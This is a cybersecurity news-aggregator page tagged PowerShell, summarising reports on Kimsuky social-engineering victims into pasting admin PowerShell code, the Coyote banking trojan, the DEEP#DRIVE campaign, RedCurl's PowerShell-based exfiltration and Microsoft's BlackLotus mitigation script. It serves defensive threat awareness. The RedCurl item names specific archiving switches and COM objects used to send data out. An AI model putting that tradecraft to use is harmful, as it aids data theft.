CyberSecurity news

FlagThis - #powershell

@gbhackers.com //

North Korean Hackers Exploit PowerShell Trick - The North Korea-linked APT group Kimsuky is tricking targets into running PowerShell as an administrator and executing malicious code, using a browser-based remote desktop tool for data exfiltration.
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.

If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

Recommended read:
References :
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
  • The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns.
  • : Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
  • www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
  • www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
  • www.scworld.com: PowerShell exploited in new Kimsuky intrusions
  • Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
  • The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
  • MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
  • securityaffairs.com: Analyzing DEEP#DRIVE: North Korean
@securityonline.info //

Coyote Malware Expands Reach Targeting Windows Systems - The Coyote Banking Trojan targets Microsoft Windows users, distributed via malicious LNK files executing PowerShell commands to harvest sensitive information and bypass sandbox discovery, now targeting 1,030 sites and 73 financial institutions.
Fortinet's FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan. This sophisticated malware, targeting Microsoft Windows users, has expanded its reach to include 1,030 websites and 73 financial institutions. The malware is distributed through malicious LNK files that execute PowerShell commands, initiating a multi-stage attack. The primary goal is to harvest sensitive data, including system details and lists of installed antivirus products.

The attack sequence begins with a LNK file executing a PowerShell command to retrieve a next-stage PowerShell script, launching the trojan. Once deployed, the trojan gathers system information and evades detection by security measures. Should a victim attempt to access a targeted site, the malware communicates with a command-and-control server, enabling actions like capturing screenshots or displaying phishing overlays to steal sensitive credentials, impacting financial cybersecurity.

Recommended read:
References :
  • gbhackers.com: FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan, a sophisticated malware targeting Microsoft Windows users.
  • www.scworld.com: Updated Coyote malware facilitates more extensive compromise
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • The Hacker News: Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
  • securityonline.info: SecurityOnline article about the multi-stage Coyote banking trojan targeting Brazil.
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil
@gbhackers.com //

Kimsuky Attacks South Korea with PowerShell - North Korean Kimsuky group (APT43) targets South Korean entities using PowerShell and Dropbox for data exfiltration via spear phishing, emphasizing the need for robust email security.
North Korean state-backed threat group Kimsuky, also known as APT43, is actively targeting South Korean entities through a sophisticated cyber campaign, dubbed DEEP#DRIVE. This ongoing operation, potentially active since September, involves attacks leveraging PowerShell and Dropbox against South Korean government, business, and cryptocurrency firms. The attackers initiate intrusions with phishing emails containing a ZIP archive with an LNK file, disguised as legitimate documents, to trick recipients into triggering the infection process.

The attack chain relies heavily on PowerShell scripts for various stages, including payload delivery, reconnaissance, and execution, as well as using Dropbox for payload distribution and data exfiltration. Upon execution, the LNK file initiates a PowerShell script that retrieves a lure document hosted on Dropbox. It also retrieves another PowerShell script for system data exfiltration and installs a third script to execute an unknown .NET assembly. This cloud-based infrastructure enables stealthy payload hosting and retrieval, complicating detection efforts.

Recommended read:
References :
@securityonline.info //

Microsoft Releases PowerShell Script to Mitigate BlackLotus UEFI Bootkit - Microsoft released a PowerShell script to update bootable media with the “Windows UEFI CA 2023” certificate to mitigate BlackLotus UEFI bootkit threats, improving system security.
Microsoft has released a PowerShell script designed to help Windows users and administrators update bootable media. The purpose of this update is to utilize the new "Windows UEFI CA 2023" certificate, which is critical for mitigating threats posed by the BlackLotus UEFI bootkit. This bootkit is capable of bypassing Secure Boot and gaining control over the operating system's boot process, potentially disabling crucial Windows security features.

The PowerShell script enables IT administrators to update the Windows Boot Manager’s certificates to align with the latest security standards. It supports various bootable media types, including ISO CD/DVD image files, USB flash drives, local drive paths, and network drive paths. To execute the update, the Windows ADK (Assessment and Deployment Kit) must be installed.

Recommended read:
References :
  • BleepingComputer: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year.
  • securityonline.info: Microsoft Releases PowerShell Script for UEFI Certificate Update
  • Cybersecurity News: Although support for Windows 8 has long since ended, Windows 11 still retains UEFI digital certificates issued during
  • BleepingComputer: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year.
  • www.bleepingcomputer.com: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year.
  • www.bleepingcomputer.com: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year.
  • Anonymous ???????? :af:: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the UEFI bootkit are enforced later this year.
Oleg (noreply@blogger.com)@Know Your Adversary //

RedCurl APT Abuses PowerShell for Data Exfiltration - The RedCurl APT is actively abusing PowerShell for data collection and exfiltration using 7-Zip to archive data and MSXML2.ServerXMLHTTP and ADODB.Stream for exfiltration.
The RedCurl APT, also known as Earth Kapre or Red Wolf, has been observed abusing PowerShell for data collection and exfiltration. According to a report by eSentire, this sophisticated cyber espionage group is actively targeting private sector organizations, with a particular focus on corporate espionage. The attackers use a multi-stage intrusion to bypass conventional defenses, starting with phishing ploys and breaking down the intrusion into stages.

RedCurl leverages PowerShell in several key steps of their attacks. First, they use 7-Zip to archive collected data, employing specific command-line parameters like "x", "-aoa", "-p", and "-o" during the archival process. Then, PowerShell is used to exfiltrate the archived data via MSXML2.ServerXMLHTTP and ADODB.Stream, employing commands such as "LoadFromFile", "PUT", and "Send". eSentire's Threat Response Unit (TRU) advises tracking these specific PowerShell executions and command-line arguments to detect and mitigate RedCurl's activities.

Recommended read:
References :
  • www.esentire.com: eSentire report on RedCurl abusing PowerShell.
  • Know Your Adversary: RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
  • Information Security Buzz: eSentire Uncovers EarthKapre/RedCurl Attack Targeting Law Firms
  • socprime.com: RedCurl/EarthKapre APT Attack Detection: A Sophisticated Cyber-Espionage Group Uses a Legitimate Adobe Executable to Deploy a Loader
  • Virus Bulletin: eSentire researchers summarise a recent investigation into an attack by the RedCurl/EarthKapre APT against an organization within the legal services industry. The group primarily targets private-sector organizations with a focus on corporate espionage.
  • SOC Prime Blog: The nefarious cyber-espionage hacking collective tracked as EarthKapre or RedCurl APT has resurfaced to target legal sector organizations using Indeed-themed phishing.
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre… [net] [mal]

Blogs

Research Tools